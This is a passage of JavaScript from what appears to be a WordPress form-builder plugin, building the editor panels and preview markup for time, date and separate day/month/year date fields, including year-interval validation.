		mm_label.setAttribute("class", "mini_label");
		mm_label.setAttribute("id", i+"_mini_label_mm");
		mm_label.innerHTML = w_mini_labels[1];
			
	var mm_ = document.createElement('span');
		mm_.style.cssText = "font-style:bold; vertical-align:middle";
		mm_.innerHTML="&nbsp;:&nbsp;";
        mm_.setAttribute("class", 'wdform_colon');
		
	var ss = document.createElement('input');
           	ss.setAttribute("type", 'text');
		ss.setAttribute("value", w_ss);
		ss.setAttribute("class", "time_box");
		
		ss.setAttribute("id", i+"_ssform_id_temp");
		ss.setAttribute("name", i+"_ssform_id_temp");
		ss.setAttribute("onKeyPress", "return check_second(event, '"+i+"_ssform_id_temp')");
		ss.setAttribute("onKeyUp", "change_second(event, '"+i+"_ssform_id_temp')");
		ss.setAttribute("onBlur", "add_0('"+i+"_ssform_id_temp')");

	var ss_label = document.createElement('label');
		ss_label.setAttribute("class", "mini_label");
		ss_label.setAttribute("id", i+"_mini_label_ss");
		ss_label.innerHTML = w_mini_labels[2];
			
      	var main_td  = document.getElementById('show_table');
	
      
      	td1.appendChild(label);
      	td1.appendChild(required);
		
      	td_time_input1.appendChild(hh);
      	td_time_input1_ket.appendChild(hh_);
      	td_time_input2.appendChild(mm);
      	td_time_input2_ket.appendChild(mm_);
      	td_time_input3.appendChild(ss);
      	tr_time1.appendChild(td_time_input1);
      	tr_time1.appendChild(td_time_input1_ket);
      	tr_time1.appendChild(td_time_input2);
      	tr_time1.appendChild(td_time_input2_ket);
      	tr_time1.appendChild(td_time_input3);
		
      	td_time_label1.appendChild(hh_label);
      	td_time_label2.appendChild(mm_label);
      	td_time_label3.appendChild(ss_label);
      	tr_time2.appendChild(td_time_label1);
      	tr_time2.appendChild(td_time_label1_ket);
      	tr_time2.appendChild(td_time_label2);
      	tr_time2.appendChild(td_time_label2_ket);
      	tr_time2.appendChild(td_time_label3);
      	table_time.appendChild(tr_time1);
      	table_time.appendChild(tr_time2);
		
        td2.appendChild(adding_type);
	
        td2.appendChild(adding_required);
	td2.appendChild(table_time);
      	tr.appendChild(td1);
      	tr.appendChild(td2);
      	table.appendChild(tr);
      
      	div.appendChild(table);
      	div.appendChild(br3);
        div.appendChild(div_for_editable_labels);
      	main_td.appendChild(div);

	if(w_field_label_pos=="top")
				label_top(i);
	if(w_time_type=="12")
				format_12(i, w_am_pm,w_hh, w_mm,w_ss);

	if (w_sec == "0") {
    second_no(i);
  }
  change_class(w_class, i);
  refresh_attr(i, 'type_time');
  jQuery(document).ready(function() {
    jQuery("label#"+i+"_mini_label_hh").click(function() {
      if (jQuery(this).children('input').length == 0) {
        var hh = "<input type='text' class='hh' size='4' style='outline:none; border:none; background:none;' value=\""+jQuery(this).text()+"\">";
        jQuery(this).html(hh);							
        jQuery("input.hh").focus();			
        jQuery("input.hh").blur(function() {
          var value = jQuery(this).val();
          jQuery("#"+i+"_mini_label_hh").text(value);
        });
      }
    });
    jQuery("label#"+i+"_mini_label_mm").click(function() {	
      if (jQuery(this).children('input').length == 0) {		
        var mm = "<input type='text' class='mm' size='4' style='outline:none; border:none; background:none;' value=\""+jQuery(this).text()+"\">";	
        jQuery(this).html(mm);			
        jQuery("input.mm").focus();					
        jQuery("input.mm").blur(function() {			
          var value = jQuery(this).val();			
          jQuery("#"+i+"_mini_label_mm").text(value);	
        });
      }
    });
		jQuery("label#"+i+"_mini_label_ss").click(function() {
      if (jQuery(this).children('input').length == 0) {
        var ss = "<input type='text' class='ss' size='4' style='outline:none; border:none; background:none;' value=\""+jQuery(this).text()+"\">";
        jQuery(this).html(ss);
        jQuery("input.ss").focus();
        jQuery("input.ss").blur(function() {
          var value = jQuery(this).val();
          jQuery("#"+i+"_mini_label_ss").text(value);
        });
      }
    });
	});
}

function type_date(i, w_field_label, w_field_label_pos, w_date, w_required, w_class, w_format, w_but_val, w_attr_name, w_attr_value) { 

	document.getElementById("element_type").value="type_date";

	delete_last_child();
// edit table	
	var edit_div  = document.createElement('div');
		edit_div.setAttribute("id", "edit_div");
		edit_div.setAttribute("style", "border-top:1px dotted black;padding:10px;  padding-top:0px; padding-bottom:0px; margin-top:10px;");
		
	var edit_main_table  = document.createElement('table');
		edit_main_table.setAttribute("id", "edit_main_table");
		edit_main_table.setAttribute("cellpadding", "0");
		edit_main_table.setAttribute("cellspacing", "0");
		
	var edit_main_tr1  = document.createElement('tr');
      		edit_main_tr1.setAttribute("valing", "top");
		
	var edit_main_tr2  = document.createElement('tr');
      		edit_main_tr2.setAttribute("valing", "top");
		
	var edit_main_tr3  = document.createElement('tr');
      		edit_main_tr3.setAttribute("valing", "top");
		
	var edit_main_tr4  = document.createElement('tr');
      		edit_main_tr4.setAttribute("valing", "top");
		
	var edit_main_tr5  = document.createElement('tr');
      		edit_main_tr5.setAttribute("valing", "top");
			
	var edit_main_tr6  = document.createElement('tr');
      		edit_main_tr6.setAttribute("valing", "top");

	var edit_main_tr7  = document.createElement('tr');
      		edit_main_tr7.setAttribute("valing", "top");

	var edit_main_td1 = document.createElement('td');
		edit_main_td1.style.cssText = "padding-top:10px";	
	var edit_main_td1_1 = document.createElement('td');
		edit_main_td1_1.style.cssText = "padding-top:10px";		
	var edit_main_td2 = document.createElement('td');
		edit_main_td2.style.cssText = "padding-top:10px";
	var edit_main_td2_1 = document.createElement('td');
		edit_main_td2_1.style.cssText = "padding-top:10px";

	var edit_main_td3 = document.createElement('td');
		edit_main_td3.style.cssText = "padding-top:10px";
	var edit_main_td3_1 = document.createElement('td');
		edit_main_td3_1.style.cssText = "padding-top:10px";
	var edit_main_td4 = document.createElement('td');
		edit_main_td4.style.cssText = "padding-top:10px";
	var edit_main_td4_1 = document.createElement('td');
		edit_main_td4_1.style.cssText = "padding-top:10px";
		
	var edit_main_td5 = document.createElement('td');
		edit_main_td5.style.cssText = "padding-top:10px";
	var edit_main_td5_1 = document.createElement('td');
		edit_main_td5_1.style.cssText = "padding-top:10px";
				
	var edit_main_td6 = document.createElement('td');
		edit_main_td6.style.cssText = "padding-top:10px";
	var edit_main_td6_1 = document.createElement('td');
		edit_main_td6_1.style.cssText = "padding-top:10px";
	var edit_main_td7 = document.createElement('td');
		edit_main_td7.style.cssText = "padding-top:10px";
	var edit_main_td7_1 = document.createElement('td');
		edit_main_td7_1.style.cssText = "padding-top:10px";
		  
	var el_label_label = document.createElement('label');
			        el_label_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
			el_label_label.innerHTML = "Field label";
	
	var el_label_textarea = document.createElement('textarea');
                el_label_textarea.setAttribute("id", "edit_for_label");
                el_label_textarea.setAttribute("rows", "4");
                el_label_textarea.style.cssText = "width:200px;";
                el_label_textarea.setAttribute("onKeyUp", "change_label('"+i+"_element_labelform_id_temp', this.value)");
				el_label_textarea.innerHTML = w_field_label;
		
	var el_label_position_label = document.createElement('label');
			        el_label_position_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_label_position_label.innerHTML = "Field label position";
	
	var el_label_position1 = document.createElement('input');
                el_label_position1.setAttribute("id", "edit_for_label_position_top");
                el_label_position1.setAttribute("type", "radio");
                el_label_position1.setAttribute("value", "left");
                

                el_label_position1.setAttribute("name", "edit_for_label_position");
                el_label_position1.setAttribute("onchange", "label_left("+i+")");
				el_label_position1.setAttribute("checked", "checked");
		Left = document.createTextNode("Left");
		
	var el_label_position2 = document.createElement('input');
                el_label_position2.setAttribute("id", "edit_for_label_position_left");
                el_label_position2.setAttribute("type", "radio");
                el_label_position2.setAttribute("value", "top");
	

                el_label_position2.setAttribute("name", "edit_for_label_position");
                el_label_position2.setAttribute("onchange", "label_top("+i+")");
		Top = document.createTextNode("Top");
		
	if(w_field_label_pos=="top")
	
				el_label_position2.setAttribute("checked", "checked");
	else
				el_label_position1.setAttribute("checked", "checked");

	var el_format_label = document.createElement('label');
	        el_format_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_format_label.innerHTML = "Date format";
	
	var el_format_textarea = document.createElement('input');
                el_format_textarea.setAttribute("id", "date_format");
		el_format_textarea.setAttribute("type", "text");
		el_format_textarea.setAttribute("value", w_format);
                el_format_textarea.style.cssText = "width:200px;";
                el_format_textarea.setAttribute("onChange", "change_date_format(this.value,'"+i+"')");

	var el_button_value_label = document.createElement('label');
	        el_button_value_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_button_value_label.innerHTML = "Date Picker label";
	
	var el_button_value_textarea = document.createElement('input');
                el_button_value_textarea.setAttribute("id", "button_value");
		el_button_value_textarea.setAttribute("type", "text");
		el_button_value_textarea.setAttribute("value", w_but_val);
                el_button_value_textarea.style.cssText = "width:150px;";
                el_button_value_textarea.setAttribute("onKeyUp", "change_file_value(this.value,'"+i+"_buttonform_id_temp')");

	var el_style_label = document.createElement('label');
	        el_style_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_style_label.innerHTML = "Class name";
	
	var el_style_textarea = document.createElement('input');
                el_style_textarea.setAttribute("id", "element_style");
		el_style_textarea.setAttribute("type", "text");
		el_style_textarea.setAttribute("value", w_class);
                el_style_textarea.style.cssText = "width:200px;";
                el_style_textarea.setAttribute("onChange", "change_class(this.value,'"+i+"')");

	var el_required_label = document.createElement('label');
	        el_required_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_required_label.innerHTML = "Required";
	
	var el_required = document.createElement('input');
                el_required.setAttribute("id", "el_send");
                el_required.setAttribute("type", "checkbox");
                el_required.setAttribute("value", "yes");
                el_required.setAttribute("onclick", "set_required('"+i+"_required')");
	if(w_required=="yes")
			
                el_required.setAttribute("checked", "checked");
		
	var el_attr_label = document.createElement('label');
	                el_attr_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
			el_attr_label.innerHTML = "Additional Attributes";
	var el_attr_add = document.createElement('img');
                el_attr_add.setAttribute("id", "el_choices_add");
           	el_attr_add.setAttribute("src", fmc_plugin_url+'/images/add.png');
            	el_attr_add.style.cssText = 'cursor:pointer; margin-left:68px';
            	el_attr_add.setAttribute("title", 'add');
                el_attr_add.setAttribute("onClick", "add_attr("+i+", 'type_date')");
	var el_attr_table = document.createElement('table');
                el_attr_table.setAttribute("id", 'attributes');
                el_attr_table.setAttribute("border", '0');
        	el_attr_table.style.cssText = 'margin-left:0px';
	var el_attr_tr_label = document.createElement('tr');
                el_attr_tr_label.setAttribute("idi", '0');
	var el_attr_td_name_label = document.createElement('th');
            	el_attr_td_name_label.style.cssText = 'width:100px';
	var el_attr_td_value_label = document.createElement('th');
            	el_attr_td_value_label.style.cssText = 'width:100px';
	var el_attr_td_X_label = document.createElement('th');
            	el_attr_td_X_label.style.cssText = 'width:10px';
	var el_attr_name_label = document.createElement('label');
	                el_attr_name_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 11px";
			el_attr_name_label.innerHTML = "Name";
			
	var el_attr_value_label = document.createElement('label');
	                el_attr_value_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 11px";
			el_attr_value_label.innerHTML = "Value";
			
	el_attr_table.appendChild(el_attr_tr_label);
	el_attr_tr_label.appendChild(el_attr_td_name_label);
	el_attr_tr_label.appendChild(el_attr_td_value_label);
	el_attr_tr_label.appendChild(el_attr_td_X_label);
	el_attr_td_name_label.appendChild(el_attr_name_label);
	el_attr_td_value_label.appendChild(el_attr_value_label);
	
	n=w_attr_name.length;
	for(j=1; j<=n; j++)
	{	
		var el_attr_tr = document.createElement('tr');
			el_attr_tr.setAttribute("id", "attr_row_"+j);
			el_attr_tr.setAttribute("idi", j);
		var el_attr_td_name = document.createElement('td');
			el_attr_td_name.style.cssText = 'width:100px';
		var el_attr_td_value = document.createElement('td');
			el_attr_td_value.style.cssText = 'width:100px';
		
		var el_attr_td_X = document.createElement('td');
		var el_attr_name = document.createElement('input');
	
			el_attr_name.setAttribute("type", "text");
	
			el_attr_name.style.cssText = "width:100px";
			el_attr_name.setAttribute("value", w_attr_name[j-1]);
			el_attr_name.setAttribute("id", "attr_name"+j);
			el_attr_name.setAttribute("onChange", "change_attribute_name("+i+", this, 'type_date')");
			
		var el_attr_value = document.createElement('input');
	
			el_attr_value.setAttribute("type", "text");
	
			el_attr_value.style.cssText = "width:100px";
			el_attr_value.setAttribute("value", w_attr_value[j-1]);
			el_attr_value.setAttribute("id", "attr_value"+j);
			el_attr_value.setAttribute("onChange", "change_attribute_value("+i+", "+j+", 'type_date')");
	
		var el_attr_remove = document.createElement('img');
			el_attr_remove.setAttribute("id", "el_choices"+j+"_remove");
			el_attr_remove.setAttribute("src", fmc_plugin_url+'/images/delete.png');
			el_attr_remove.style.cssText = 'cursor:pointer; vertical-align:middle; margin:3px';
			el_attr_remove.setAttribute("align", 'top');
			el_attr_remove.setAttribute("onClick", "remove_attr("+j+", "+i+", 'type_date')");
		el_attr_table.appendChild(el_attr_tr);
		el_attr_tr.appendChild(el_attr_td_name);
		el_attr_tr.appendChild(el_attr_td_value);
		el_attr_tr.appendChild(el_attr_td_X);
		el_attr_td_name.appendChild(el_attr_name);
		el_attr_td_value.appendChild(el_attr_value);
		el_attr_td_X.appendChild(el_attr_remove);
		
	}

	var t  = document.getElementById('edit_table');
	
	var br = document.createElement('br');
	var br1 = document.createElement('br');
	var br2 = document.createElement('br');
	var br3 = document.createElement('br');
	var br4 = document.createElement('br');
	var br5 = document.createElement('br');
	var br6 = document.createElement('br');
	
	edit_main_td1.appendChild(el_label_label);
	edit_main_td1_1.appendChild(el_label_textarea);

	edit_main_td2.appendChild(el_label_position_label);
	edit_main_td2_1.appendChild(el_label_position1);
	edit_main_td2_1.appendChild(Left);
	edit_main_td2_1.appendChild(br2);
	edit_main_td2_1.appendChild(el_label_position2);
	edit_main_td2_1.appendChild(Top);

	edit_main_td3.appendChild(el_format_label);
	edit_main_td3_1.appendChild(el_format_textarea);
	
	edit_main_td4.appendChild(el_button_value_label);
	edit_main_td4_1.appendChild(el_button_value_textarea);
	
	edit_main_td5.appendChild(el_style_label);
	edit_main_td5_1.appendChild(el_style_textarea);
	
	edit_main_td6.appendChild(el_required_label);
	edit_main_td6_1.appendChild(el_required);
	
	edit_main_td7.appendChild(el_attr_label);
	edit_main_td7.appendChild(el_attr_add);
	edit_main_td7.appendChild(br3);
	edit_main_td7.appendChild(el_attr_table);
	edit_main_td7.setAttribute("colspan", "2");
	
	edit_main_tr1.appendChild(edit_main_td1);
	edit_main_tr1.appendChild(edit_main_td1_1);
	edit_main_tr2.appendChild(edit_main_td2);
	edit_main_tr2.appendChild(edit_main_td2_1);
	edit_main_tr3.appendChild(edit_main_td3);
	edit_main_tr3.appendChild(edit_main_td3_1);
	edit_main_tr4.appendChild(edit_main_td4);
	edit_main_tr4.appendChild(edit_main_td4_1);
	edit_main_tr5.appendChild(edit_main_td5);
	edit_main_tr5.appendChild(edit_main_td5_1);
	edit_main_tr6.appendChild(edit_main_td6);
	edit_main_tr6.appendChild(edit_main_td6_1);
	edit_main_tr7.appendChild(edit_main_td7);
	edit_main_tr7.appendChild(edit_main_td7_1);
	edit_main_table.appendChild(edit_main_tr1);
	edit_main_table.appendChild(edit_main_tr2);
	edit_main_table.appendChild(edit_main_tr3);
	edit_main_table.appendChild(edit_main_tr4);
	edit_main_table.appendChild(edit_main_tr5);
	edit_main_table.appendChild(edit_main_tr6);
	edit_main_table.appendChild(edit_main_tr7);
	edit_div.appendChild(edit_main_table);
	
	t.appendChild(edit_div);
	add_id_and_name(i, 'type_text');
	
//show table
	var adding_type = document.createElement("input");
            adding_type.setAttribute("type", "hidden");
            adding_type.setAttribute("value", "type_date");
            adding_type.setAttribute("name", i+"_typeform_id_temp");
            adding_type.setAttribute("id", i+"_typeform_id_temp");
	var adding_required = document.createElement("input");
            adding_required.setAttribute("type", "hidden");
            adding_required.setAttribute("value", w_required);
            adding_required.setAttribute("name", i+"_requiredform_id_temp");
			
            adding_required.setAttribute("id", i+"_requiredform_id_temp");
			
     	var div = document.createElement('div');
      	    div.setAttribute("id", "main_div");
					
      	var table = document.createElement('table');
           	table.setAttribute("id", i+"_elemet_tableform_id_temp");
			
      	var tr = document.createElement('tr');
			
      	var td1 = document.createElement('td');
         	td1.setAttribute("valign", 'middle');
         	td1.setAttribute("align", 'left');
           	td1.setAttribute("id", i+"_label_sectionform_id_temp");
			
      	var td2 = document.createElement('td');
        	td2.setAttribute("valign", 'middle');
         	td2.setAttribute("align", 'left');
           	td2.setAttribute("id", i+"_element_sectionform_id_temp");
			
      	var table_date = document.createElement('table');
           	table_date.setAttribute("id", i+"_table_date");
           	table_date.setAttribute("cellpadding", '0');
           	table_date.setAttribute("cellspacing", '0');
			
      	var tr_date1 = document.createElement('tr');
           	tr_date1.setAttribute("id", i+"_tr_date1");
			
      	var tr_date2 = document.createElement('tr');
           	tr_date2.setAttribute("id", i+"_tr_date2");
			
      	var td_date_input1 = document.createElement('td');
           	td_date_input1.setAttribute("id", i+"_td_date_input1");
			
      	var td_date_input2 = document.createElement('td');
           	td_date_input2.setAttribute("id", i+"_td_date_input2");
			
      	var td_date_input3 = document.createElement('td');
           	td_date_input3.setAttribute("id", i+"_td_date_input3");

      	var td_date_label1 = document.createElement('td');
           	td_date_label1.setAttribute("id", i+"_td_date_label1");
			
      	var td_date_label2 = document.createElement('td');
           	td_date_label2.setAttribute("id", i+"_td_date_label2");
			
      	var td_date_label3 = document.createElement('td');
           	td_date_label3.setAttribute("id", i+"_td_date_label3");
			
      	var br1 = document.createElement('br');
      	var br2 = document.createElement('br');
     	var br3 = document.createElement('br');
      	var br4 = document.createElement('br');
      

      	var label = document.createElement('span');
		label.setAttribute("id", i+"_element_labelform_id_temp");
		label.innerHTML = w_field_label;
		label.setAttribute("class", "label");
      	var required = document.createElement('span');
			required.setAttribute("id", i+"_required_elementform_id_temp");
			required.innerHTML = "";
			required.setAttribute("class", "required");
	if(w_required=="yes")
			required.innerHTML = " *";
			
	var adding = document.createElement('input');
            adding.setAttribute("type", 'text');
            adding.setAttribute("value", w_date);
            adding.setAttribute("class", 'wdform_date');
			adding.setAttribute("id", i+"_elementform_id_temp");
			adding.setAttribute("name", i+"_elementform_id_temp");
			adding.setAttribute("maxlength", "10");
			adding.setAttribute("size", "10");
			adding.setAttribute("onChange", "change_value('"+i+"_elementform_id_temp')");
		
	var adding_button = document.createElement('input');
 	    adding_button.setAttribute("id", i+"_buttonform_id_temp");
            adding_button.setAttribute("type", 'reset');
            adding_button.setAttribute("value", w_but_val);
            adding_button.setAttribute("format", w_format);
            adding_button.setAttribute("onclick", "return showCalendar('"+i+"_elementform_id_temp' ,'"+w_format+"')");
            adding_button.setAttribute("class", 'button');
	    
      	var main_td  = document.getElementById('show_table');
      
      	td1.appendChild(label);
      	td1.appendChild(required);
		
      	td2.appendChild(adding_type);
	
      	td2.appendChild(adding_required);
		td2.appendChild(adding);
		td2.appendChild(adding_button);
      	tr.appendChild(td1);
      	tr.appendChild(td2);
      	table.appendChild(tr);
      
      	div.appendChild(table);
      	div.appendChild(br3);
      	main_td.appendChild(div);

	if(w_field_label_pos=="top")
				label_top(i);
change_class(w_class, i);
refresh_attr(i, 'type_date');
}

function field_to_select(id, type)
{

	switch(type)
	{
		case 'day': 
		{
			w_width=document.getElementById('edit_for_day_size').value!=''?document.getElementById('edit_for_day_size').value:30;
			w_day=document.getElementById(id+"_dayform_id_temp").value;
			document.getElementById(id+"_td_date_input1").innerHTML='';	
			
			var select_day  = document.createElement('select');
				select_day.setAttribute("id", id+'_dayform_id_temp');
				select_day.setAttribute("name", id+'_dayform_id_temp');
				select_day.setAttribute("onChange", 'set_select(this)');
				select_day.style.width=w_width+'px';
				
			var options  = document.createElement('option');
				options.setAttribute("value",'');
				options.innerHTML= '';
				select_day.appendChild(options);
				
			for(k=1; k<=31;k++)
			{
				if(k<10)
					k='0'+k;
				var options  = document.createElement('option');
					options.setAttribute("value", k);
					options.innerHTML= k;
				 if (k==w_day) 
					options.setAttribute("selected", "selected");

					select_day.appendChild(options);
					
			}

			document.getElementById(id+"_td_date_input1").appendChild(select_day);

			break;	
		}
		case 'month': 
		{ 
			w_width=document.getElementById('edit_for_month_size').value!=''?document.getElementById('edit_for_month_size').value:60;
			w_month=document.getElementById(id+"_monthform_id_temp").value;
			
			document.getElementById(id+"_td_date_input2").innerHTML='';
			
		var select_month = document.createElement('select');
				select_month.setAttribute("id", id+'_monthform_id_temp');
				select_month.setAttribute("name", id+'_monthform_id_temp');
				select_month.setAttribute("onChange", 'set_select(this)');
				select_month.style.width=w_width+'px';
				
		var options  = document.createElement('option');
				options.setAttribute("value",'');
				options.innerHTML= '';
				select_month.appendChild(options);
				
		var myMonths=new Array("<!--repstart-->January<!--repend-->","<!--repstart-->February<!--repend-->","<!--repstart-->March<!--repend-->","<!--repstart-->April<!--repend-->","<!--repstart-->May<!--repend-->","<!--repstart-->June<!--repend-->","<!--repstart-->July<!--repend-->","<!--repstart-->August<!--repend-->","<!--repstart-->September<!--repend-->","<!--repstart-->October<!--repend-->","<!--repstart-->November<!--repend-->","<!--repstart-->December<!--repend-->");
			for(k=1; k<=12;k++)
			{
				if(k<10)
					k='0'+k;
				var options  = document.createElement('option');
					options.setAttribute("value", k);
					options.innerHTML= myMonths[k-1];
				if (k==w_month) 
					options.setAttribute("selected", "selected");

					select_month.appendChild(options);
					
			}
			document.getElementById(id+"_td_date_input2").appendChild(select_month);
		break;	
		}	
		case 'year':
		{ 
			w_width=document.getElementById('edit_for_year_size').value!=''?document.getElementById('edit_for_year_size').value:60;
			w_year=document.getElementById(id+"_yearform_id_temp").value;
			
		document.getElementById(id+"_td_date_input3").innerHTML=''; 
		var select_year  = document.createElement('select');
			select_year.setAttribute("id", id+'_yearform_id_temp');
			select_year.setAttribute("name", id+'_yearform_id_temp');
			select_year.setAttribute("onChange", 'set_select(this)');
			select_year.style.width=w_width+'px';
			
		var options  = document.createElement('option');
			options.setAttribute("value",'');
			options.innerHTML= '';
			select_year.appendChild(options);
			
		from= parseInt(document.getElementById("edit_for_year_interval_from").value);
		to= parseInt(document.getElementById("edit_for_year_interval_to").value);
		for(k=to; k>=from;k--)
		{
		var options  = document.createElement('option');
			options.setAttribute("value", k);
			options.innerHTML= k;
		if (k==w_year) 
			options.setAttribute("selected", "selected");
			
			select_year.appendChild(options);
		}
		select_year.value=w_year;
		select_year.setAttribute('from',from);
		select_year.setAttribute('to',to);
		document.getElementById(id+"_td_date_input3").appendChild(select_year);
		
		break;
		}
	}
	
refresh_attr(id, 'type_date_fields');

}

function field_to_text(id, type)
{

	switch(type)
	{
		case 'day': 
		{	
			w_width=document.getElementById('edit_for_day_size').value!=''?document.getElementById('edit_for_day_size').value:30;
			w_day=document.getElementById(id+"_dayform_id_temp").value;
			document.getElementById(id+"_td_date_input1").innerHTML='';	

			var day = document.createElement('input');
			day.setAttribute("type", 'text');
			day.setAttribute("value", w_day);
			//day.setAttribute("class", "time_box");
			day.setAttribute("id", id+"_dayform_id_temp");
			day.setAttribute("name", id+"_dayform_id_temp");
			day.setAttribute("onChange", "change_value('"+ id+"_dayform_id_temp')");
			day.setAttribute("onKeyPress", "return check_day(event, '"+id+"_dayform_id_temp')");
		    day.setAttribute("onBlur", "if (this.value=='0') this.value=''; else add_0('"+id+"_dayform_id_temp')");
		
			day.style.width=w_width+'px';

			document.getElementById(id+"_td_date_input1").appendChild(day);
			break;	
		}
		case 'month': 
		{ 
			w_width=document.getElementById('edit_for_month_size').value!=''?document.getElementById('edit_for_month_size').value:60;
			w_month=document.getElementById(id+"_monthform_id_temp").value;
			
			document.getElementById(id+"_td_date_input2").innerHTML='';
			
		var month = document.createElement('input');
			month.setAttribute("type", 'text');
			month.setAttribute("value", w_month);
			//month.setAttribute("class", "time_box");
			month.setAttribute("id", id+"_monthform_id_temp");
			month.setAttribute("name", id+"_monthform_id_temp");
			month.style.width=w_width+'px';
			month.setAttribute("onKeyPress", "return check_month(event, '"+id+"_monthform_id_temp')");
			month.setAttribute("onChange", "change_value('"+id+"_monthform_id_temp')");
			month.setAttribute("onBlur", "if (this.value=='0') this.value=''; else add_0('"+id+"_monthform_id_temp')");
			/*month.setAttribute("onKeyPress", "return check_minute(event, '"+i+"_mmform_id_temp')");
			month.setAttribute("onKeyUp", "change_minute(event, '"+i+"_mmform_id_temp')");
			month.setAttribute("onBlur", "add_0('"+i+"_mmform_id_temp')");*/

			document.getElementById(id+"_td_date_input2").appendChild(month);
			break;	
		}	
		case 'year':
		{ 
			w_width=document.getElementById('edit_for_year_size').value!=''?document.getElementById('edit_for_year_size').value:60;
			w_year=document.getElementById(id+"_yearform_id_temp").value;
			
			document.getElementById(id+"_td_date_input3").innerHTML='';
			
			from= parseInt(document.getElementById("edit_for_year_interval_from").value);
			to= parseInt(document.getElementById("edit_for_year_interval_to").value);
			if((parseInt(w_year)<from) || (parseInt(w_year)>to))
				w_year='';
			var year = document.createElement('input');
			year.setAttribute("type", 'text');
			year.setAttribute("value", w_year);
			//year.setAttribute("class", "time_box");
			year.setAttribute("id", id+"_yearform_id_temp");
			year.setAttribute("name", id+"_yearform_id_temp");
			year.setAttribute("onChange", "change_year('"+id+"_yearform_id_temp')");
			year.setAttribute("onKeyPress", "return check_year1(event, '"+id+"_yearform_id_temp')");
			year.setAttribute("onBlur", "check_year2('"+id+"_yearform_id_temp')");
			year.style.width=w_width+'px';
			year.setAttribute('from',from);
			year.setAttribute('to',to);

			document.getElementById(id+"_td_date_input3").appendChild(year);

			break;
		}
	}
	refresh_attr(id, 'type_date_fields');


}

function set_divider(id, divider)
{
	document.getElementById(id+"_separator1").innerHTML=divider;
	document.getElementById(id+"_separator2").innerHTML=divider;
}

function year_interval(id)
{
	from= parseInt(document.getElementById("edit_for_year_interval_from").value);
	to= parseInt(document.getElementById("edit_for_year_interval_to").value);
	if(to-from<0)
	{	
		alert('Invalid interval of years.');
		document.getElementById("edit_for_year_interval_from").value=to;
	}
	else
	{
		if(document.getElementById(id+"_yearform_id_temp").tagName=='SELECT')
			field_to_select(id, 'year');
		else
			field_to_text(id, 'year');
	}
}

function type_date_fields(i, w_field_label, w_field_label_pos, w_day, w_month, w_year, w_day_type, w_month_type, w_year_type, w_day_label, w_month_label, w_year_label, w_day_size, w_month_size, w_year_size, w_required, w_class, w_from, w_to, w_divider, w_attr_name, w_attr_value) { 

	document.getElementById("element_type").value="type_date_fields";

	delete_last_child();
// edit table	
	var edit_div  = document.createElement('div');
		edit_div.setAttribute("id", "edit_div");
		edit_div.setAttribute("style", "border-top:1px dotted black;padding:10px;  padding-top:0px; padding-bottom:0px; margin-top:10px;");
		
	var edit_main_table  = document.createElement('table');
		edit_main_table.setAttribute("id", "edit_main_table");
		edit_main_table.setAttribute("cellpadding", "0");
		edit_main_table.setAttribute("cellspacing", "0");
		
	var edit_main_tr1  = document.createElement('tr');
      		edit_main_tr1.setAttribute("valing", "top");
		
	var edit_main_tr2  = document.createElement('tr');
      		edit_main_tr2.setAttribute("valing", "top");
		
	var edit_main_tr3  = document.createElement('tr');
      		edit_main_tr3.setAttribute("valing", "top");
		
	var edit_main_tr4  = document.createElement('tr');
      		edit_main_tr4.setAttribute("valing", "top");
		
	var edit_main_tr8  = document.createElement('tr');
      		edit_main_tr8.setAttribute("valing", "top");
			
	var edit_main_tr9  = document.createElement('tr');
      		edit_main_tr9.setAttribute("valing", "top");
		
	var edit_main_tr5  = document.createElement('tr');
      		edit_main_tr5.setAttribute("valing", "top");
			
	var edit_main_tr6  = document.createElement('tr');
      		edit_main_tr6.setAttribute("valing", "top");

	var edit_main_tr7  = document.createElement('tr');
      		edit_main_tr7.setAttribute("valing", "top");

	var edit_main_td1 = document.createElement('td');
		edit_main_td1.style.cssText = "padding-top:10px";	
	var edit_main_td1_1 = document.createElement('td');
		edit_main_td1_1.style.cssText = "padding-top:10px";		
	var edit_main_td2 = document.createElement('td');
		edit_main_td2.style.cssText = "padding-top:10px";
	var edit_main_td2_1 = document.createElement('td');
		edit_main_td2_1.style.cssText = "padding-top:10px";

	var edit_main_td3 = document.createElement('td');
		edit_main_td3.style.cssText = "padding-top:10px";
	var edit_main_td3_1 = document.createElement('td');
		edit_main_td3_1.style.cssText = "padding-top:10px";

	var edit_main_td4 = document.createElement('td');
		edit_main_td4.style.cssText = "padding-top:10px";
	var edit_main_td4_1 = document.createElement('td');
		edit_main_td4_1.style.cssText = "padding-top:10px";
		
	var edit_main_td8 = document.createElement('td');
		edit_main_td8.style.cssText = "padding-top:10px";
	var edit_main_td8_1 = document.createElement('td');
		edit_main_td8_1.style.cssText = "padding-top:10px";
		
	var edit_main_td9 = document.createElement('td');
		edit_main_td9.style.cssText = "padding-top:10px";
	var edit_main_td9_1 = document.createElement('td');
		edit_main_td9_1.style.cssText = "padding-top:10px";
		
	var edit_main_td5 = document.createElement('td');
		edit_main_td5.style.cssText = "padding-top:10px";
	var edit_main_td5_1 = document.createElement('td');
		edit_main_td5_1.style.cssText = "padding-top:10px";
				
	var edit_main_td6 = document.createElement('td');
		edit_main_td6.style.cssText = "padding-top:10px";
	var edit_main_td6_1 = document.createElement('td');
		edit_main_td6_1.style.cssText = "padding-top:10px";
		
	var edit_main_td7 = document.createElement('td');
		edit_main_td7.style.cssText = "padding-top:10px";
	var edit_main_td7_1 = document.createElement('td');
		edit_main_td7_1.style.cssText = "padding-top:10px";
		  
	var el_label_label = document.createElement('label');
			        el_label_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
			el_label_label.innerHTML = "Field label";
	
	var el_label_textarea = document.createElement('textarea');
                el_label_textarea.setAttribute("id", "edit_for_label");
                el_label_textarea.setAttribute("rows", "4");
                el_label_textarea.style.cssText = "width:200px;";
                el_label_textarea.setAttribute("onKeyUp", "change_label('"+i+"_element_labelform_id_temp', this.value)");
				el_label_textarea.innerHTML = w_field_label;
